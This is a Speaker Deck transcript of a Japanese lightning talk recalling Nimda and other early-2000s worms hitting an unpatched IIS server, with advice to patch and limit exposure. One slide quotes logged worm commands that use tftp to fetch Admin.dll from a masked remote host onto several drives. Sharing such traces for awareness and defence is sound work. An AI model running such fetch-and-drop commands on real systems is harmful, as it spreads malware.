Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
あの頃(2000年頃)のインターネット / The Internet in the early...
Search
tkito
January 23, 2025
Technology
1
130
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。
tkito
January 23, 2025
Tweet
Share
More Decks by tkito
See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
tkito
0
1k
Re: SQLiから始めるRCE生活 / RCE via SQLi
tkito
0
320
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
tkito
2
3.5k
Linuxでの権限昇格 / Privilege Escalation in Linux
tkito
0
1k
SOC-IRとOSCP / SOC-IR and OSCP
tkito
0
130
Other Decks in Technology
See All in Technology
20260114_データ横丁 新年LT大会:2026年の抱負
taromatsui_cccmkhd
0
120
Master Dataグループ紹介資料
sansan33
PRO
1
4.2k
フルカイテン株式会社 エンジニア向け採用資料
fullkaiten
0
10k
Models vs Bounded Contexts for Domain Modularizati...
ewolff
0
160
Qiita Bash アドカレ LT #1
okaru
0
190
複雑さを受け入れるか、拒むか? - 事業成長とともに育ったモノリスを前に私が考えたこと #RSGT2026
murabayashi
1
1.8k
Introduction to Bill One Development Engineer
sansan33
PRO
0
340
Introduction to Sansan for Engineers / エンジニア向け会社紹介
sansan33
PRO
5
61k
自己管理型チームと個人のセルフマネジメント 〜モチベーション編〜
kakehashi
PRO
5
2.8k
業務の煩悩を祓うAI活用術108選 / AI 108 Usages
smartbank
9
21k
kintone開発のプラットフォームエンジニアの紹介
cybozuinsideout
PRO
0
510
AI駆動開発ライフサイクル(AI-DLC)の始め方
ryansbcho79
0
330
Featured
See All Featured
Statistics for Hackers
jakevdp
799
230k
Paper Plane
katiecoart
PRO
0
45k
Prompt Engineering for Job Search
mfonobong
0
140
Test your architecture with Archunit
thirion
1
2.1k
A brief & incomplete history of UX Design for the World Wide Web: 1989–2019
jct
1
270
Accessibility Awareness
sabderemane
0
35
How to audit for AI Accessibility on your Front & Back End
davetheseo
0
140
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
9
1.1k
[RailsConf 2023] Rails as a piece of cake
palkan
58
6.2k
How To Stay Up To Date on Web Technology
chriscoyier
791
250k
The Spectacular Lies of Maps
axbom
PRO
1
430
Music & Morning Musume
bryan
46
7k
Transcript
あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう
自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり
2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット
あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます
私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •
ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀
事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5
Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理
- @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html
何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット
7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll
どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8
あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL
Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9
昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10
Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)
まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット
12
おしまい きとう @tkito 13
tkito
taromatsui_cccmkhd
sansan33
fullkaiten
ewolff
okaru
murabayashi
kakehashi
smartbank
cybozuinsideout
ryansbcho79
jakevdp
katiecoart
mfonobong
thirion
jct
sabderemane
davetheseo
irinanazarova
palkan
chriscoyier
axbom
bryan
